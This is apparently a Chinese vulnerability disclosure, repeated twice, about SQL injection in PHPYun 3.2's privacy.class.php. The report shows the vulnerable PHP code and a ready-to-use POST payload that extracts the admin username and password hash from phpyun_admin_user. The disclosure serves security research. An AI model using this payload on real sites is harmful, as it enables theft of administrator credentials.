VULHUB ™

### 简要描述： 20141222 ### 详细说明： member\user\model\privacy.class.php 中 ``` function index_action() { if(intval($_POST['status'])) { $this->obj->DB_update_all("resume","`$_POST[type]`='".intval($_POST['status'])."'","`uid`='".$this->uid."'");//没对post来的做判断 直接带入key中 造成了注入 $this->obj->member_log("设置简历是否公开"); ``` 这里我们首先先创建一个简历 然后容易直接出数据。 http://web/web/phpyun32/member/index.php/admin/?c=privacy&act=index status=1&type=address`=(select concat(username,0x23,password) from phpyun_admin_user limit 1) where uid=3#&safekey=f213ae15d14ba9de59934fdf6e3eb70f ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/251301110ee0f7f0f64dca3879018bbd22e34362.jpg" alt="p21.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/251301110ee0f7f0f64dca3879018bbd22e34362.jpg)

### 简要描述： 20141222 ### 详细说明： member\user\model\privacy.class.php 中 ``` function index_action() { if(intval($_POST['status'])) { $this->obj->DB_update_all("resume","`$_POST[type]`='".intval($_POST['status'])."'","`uid`='".$this->uid."'");//没对post来的做判断 直接带入key中 造成了注入 $this->obj->member_log("设置简历是否公开"); ``` 这里我们首先先创建一个简历 然后容易直接出数据。 http://web/web/phpyun32/member/index.php/admin/?c=privacy&act=index status=1&type=address`=(select concat(username,0x23,password) from phpyun_admin_user limit 1) where uid=3#&safekey=f213ae15d14ba9de59934fdf6e3eb70f ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/251301110ee0f7f0f64dca3879018bbd22e34362.jpg" alt="p21.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/251301110ee0f7f0f64dca3879018bbd22e34362.jpg)